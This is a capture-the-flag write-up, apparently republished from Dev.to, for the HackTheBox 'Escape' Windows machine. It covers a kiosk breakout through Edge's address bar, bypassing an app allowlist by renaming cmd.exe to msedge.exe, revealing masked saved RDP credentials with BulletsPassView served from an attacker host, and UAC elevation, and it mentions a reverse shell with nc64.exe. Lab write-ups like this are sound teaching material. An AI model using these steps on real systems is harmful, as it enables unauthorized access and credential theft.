Fetching latest headlines…
HackTheBox: vulnEscape Writeup
NORTH AMERICA
πŸ‡ΊπŸ‡Έ United Statesβ€’July 2, 2026

HackTheBox: vulnEscape Writeup

13 views0 likes0 comments
Originally published byDev.to

Summary

Escape is a Windows box that exposes only RDP (3389). The RDP session drops you into a locked-down kiosk account (KioskUser0) meant for a "Conference Display" app. The box is solved entirely through a kiosk breakout: abusing Edge's address bar to browse the local filesystem, bypassing an application allowlist by renaming binaries, then finding a third-party RDP client (Remote Desktop Plus) with saved-but-masked credentials for the admin account. Those credentials are recovered with a Nirsoft password-reveal tool, and admin turns out to be a local administrator, giving full SYSTEM-level access after a UAC prompt.

Reconnaissance

Only one port open - RDP:

nmap -A -Pn <machine-ip> -oA nmap

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Escape
| rdp-ntlm-info:
|   Target_Name: ESCAPE
|   NetBIOS_Domain_Name: ESCAPE
|   NetBIOS_Computer_Name: ESCAPE
|   DNS_Domain_Name: Escape
|   DNS_Computer_Name: Escape
|   Product_Version: 10.0.19041

Full port scan confirmed only 3389/tcp is reachable. Windows 11-based build, standalone workgroup box (ESCAPE).

Added it to hosts and connected:

echo '<machine-ip> escape.vl ESCAPE.VL' >> /etc/hosts
xfreerdp /v:<machine-ip> /cert:ignore /sec:tls

The login screen tells you exactly what to do:

Conference Display - Login as KioskUser0 without Password

Foothold - Breaking Out of the Kiosk

Logging in as KioskUser0 drops you straight into a wallpaper ("Busan Expo") with no visible taskbar or icons. Clicking around does nothing.

  • Pressing the Windows key brings up the Start menu / search bar.
  • Searching cmd and clicking it β†’ does nothing (blocked).
  • Searching edge β†’ opens successfully. So the restriction looks like an allowlist, not a blocklist β€” only specific apps (like Edge) are permitted to launch.
  • With Edge open, typing C:\ directly into the address bar renders a directory listing of the filesystem (Edge treats it as a local file:// browse). This is enough to walk the entire disk from the browser.

Browsing to the kiosk user's desktop:

C:\Users\KioskUser0\Desktop\user.txt
user.txt: [REDACTED]

Getting a real shell - allowlist bypass

Browsing to C:\Windows\System32\, I located cmd.exe and downloaded it via Edge into the Downloads folder. Running it directly failed:

μ œν•œ 사항 (Restriction)
이 μž‘μ—…μ€ μ‹œμŠ€ν…œ μ œν•œ λ•Œλ¬Έμ— μ·¨μ†Œλ˜μ—ˆμŠ΅λ‹ˆλ‹€. μ‹œμŠ€ν…œ κ΄€λ¦¬μžμ—κ²Œ λ¬Έμ˜ν•˜μ‹­μ‹œμ˜€.
(This operation was cancelled due to system restrictions. Contact your administrator.)

Renaming the downloaded binary didn't help at first β€” but since Edge (msedge.exe) is the one thing the allowlist actually permits, renaming cmd.exe β†’ msedge.exe and running it bypassed the restriction entirely and popped a working shell:

C:\Users\kioskUser0\Downloads>whoami
escape\kioskuser0

C:\Users\kioskUser0\Downloads>whoami /all
USER INFORMATION
----------------
User Name          SID
escape\kioskuser0  S-1-5-21-3698417267-3345840482-3422164602-1002

GROUP INFORMATION (relevant)
BUILTIN\Remote Desktop Users
BUILTIN\Users
Mandatory Label\Medium Mandatory Level

PRIVILEGES INFORMATION
SeShutdownPrivilege            Disabled
SeChangeNotifyPrivilege        Enabled
SeUndockPrivilege              Disabled
SeIncreaseWorkingSetPrivilege  Disabled
SeTimeZonePrivilege            Disabled

Same rename trick works for powershell.exe (download it, rename to msedge.exe, run it) to get a real PowerShell session instead of cmd.

Enumeration as kioskuser0

PS C:\Users> dir
admin
Administrator
DefaultAppPool
kioskUser0
Public

PS C:\Users> cd .\admin\
dir : Access to the path 'C:\Users\admin' is denied.

PS C:\Users> net user
admin   Administrator   DefaultAccount
Guest   kioskUser0      WDAGUtilityAccount

Can't read admin's profile directly, but a hidden admin-owned folder is visible at the root of C:\:

PS C:\> Get-ChildItem -Force
d--h--   _admin
...
d-----   temp
PS C:\_admin> ls
installers/
passwords/
temp/
Default.rdp
profiles.xml

profiles.xml is a config file for a third-party RDP client:

PS C:\_admin> type .\profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
  <Profile>
    <ProfileName>admin</ProfileName>
    <UserName>127.0.0.1</UserName>
    <Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
    <Secure>False</Secure>
  </Profile>
</Data>

An encrypted/encoded password for the admin profile β€” but we can't decrypt it manually, so the plan is to load it into the actual Remote Desktop Plus app and let the GUI decrypt it for us.

Recovering the Password

Remote Desktop Plus is installed under Program Files (x86):

PS C:\Program Files (x86)> ls
Remote Desktop Plus/

PS C:\Program Files (x86)\Remote Desktop Plus> ls
rdp.exe

Since C:\_admin isn't writable/reachable from the app's file picker, first copy profiles.xml somewhere the low-priv user can access:

copy C:\_admin\profiles.xml C:\Users\kioskUser0\Downloads\

Ran rdp.exe β†’ Manage Profiles β†’ Import β†’ selected the copied profiles.xml. The admin profile now loads in the app, with the password field shown as bullets (β€’β€’β€’β€’β€’β€’β€’β€’). Double-clicking / editing / copying the field is all blocked β€” no cleartext, no clipboard.

To reveal it, used a Nirsoft tool that reads masked password fields from Windows dialogs: BulletsPassView.


# attacker box
unzip bulletspassview.zip
python3 -m http.server 80

Downloaded BulletsPassView.exe onto the target from http://<your-ip>/BulletsPassView.exe (via the browser filesystem trick again), ran it against the open Remote Desktop Plus dialog, and it revealed the masked field:

Password: Twisting30217

Privilege Escalation β€” kioskuser0 β†’ admin

Confirmed admin is a local administrator:

PS C:\temp> net user admin
Local Group Memberships   *Administrators
Password required          No

First attempt with runas didn't actually elevate (still showed kioskuser0 after β€” likely a profile/token quirk with runas in this restricted context):

runas /user:admin powershell

Instead, spawning PowerShell with an elevation request worked and triggered a normal UAC consent prompt:

Start-Process powershell.exe -Verb runas

The prompt asked to allow Windows PowerShell (Microsoft-signed) to make changes β€” clicked Yes, and landed in an elevated shell:

PS C:\Windows\system32> whoami
escape\admin

Root Flag

PS C:\Users\Administrator\Desktop> ls
Microsoft Edge.lnk
root.txt

PS C:\Users\Administrator\Desktop> type .\root.txt
[REDACTED]

At this point you're escape\admin, a full local administrator with no shell restrictions β€” from here you can also drop nc64.exe, catch a reverse shell, and operate as SYSTEM without any of the kiosk-mode limitations.

Key Vulnerabilities & Attack Chain

  1. Kiosk breakout via browser LOLBin β€” Edge's address bar accepts local paths (C:\) and renders a full directory listing, giving filesystem access from a "locked down" kiosk session.
  2. Weak application allowlist β€” restriction is enforced by filename/allowlist rather than a real AppLocker/SRP hash policy, so simply renaming cmd.exe/powershell.exe to msedge.exe bypasses it entirely.
  3. Cleartext-recoverable stored credentials β€” Remote Desktop Plus stores admin RDP credentials in a world-readable-once-copied profiles.xml; the app's own password masking is trivially defeated with a generic password-reveal tool (BulletsPassView), since it's just a masked UI field, not real encryption-at-rest protection.
  4. Weak/no password policy β€” admin account had "password required: No" enabled at some point and a simple password (Twisting30217).
  5. Standard UAC consent β€” once valid admin credentials/session are available, Start-Process -Verb runas + accepting the UAC prompt is enough to get a fully elevated administrator shell.

Attack Chain

RDP β†’ KioskUser0 (no password)
β”‚
β”œβ”€β”€ Kiosk breakout
β”‚   β”œβ”€β”€ Win key β†’ Start search
β”‚   β”‚   β”œβ”€β”€ "cmd"  β†’ blocked (allowlist)
β”‚   β”‚   └── "edge" β†’ allowed
β”‚   └── Edge address bar β†’ C:\  (file:// directory listing)
β”‚       └── user.txt  [FLAG 1]
β”‚
β”œβ”€β”€ Shell access
β”‚   β”œβ”€β”€ Download cmd.exe / powershell.exe from System32
β”‚   β”œβ”€β”€ Rename β†’ msedge.exe
β”‚   └── Run β†’ allowlist bypassed β†’ shell as escape\kioskuser0
β”‚
β”œβ”€β”€ Credential discovery
β”‚   β”œβ”€β”€ C:\_admin\profiles.xml  (Remote Desktop Plus config)
β”‚   β”œβ”€β”€ copy β†’ C:\Users\kioskUser0\Downloads\
β”‚   β”œβ”€β”€ Import into rdp.exe (Remote Desktop Plus GUI)
β”‚   β”‚   └── password shown as ●●●●●●●● (masked)
β”‚   └── BulletsPassView.exe (hosted on attacker box, downloaded to target)
β”‚       └── reveals password β†’ Twisting30217
β”‚
└── Privilege escalation
    β”œβ”€β”€ net user admin β†’ member of Administrators
    β”œβ”€β”€ runas /user:admin powershell β†’ didn't elevate
    └── Start-Process powershell -Verb runas
        └── UAC prompt β†’ Yes β†’ escape\admin
            └── root.txt  [FLAG 2]

Comments (0)

Sign in to join the discussion

Be the first to comment!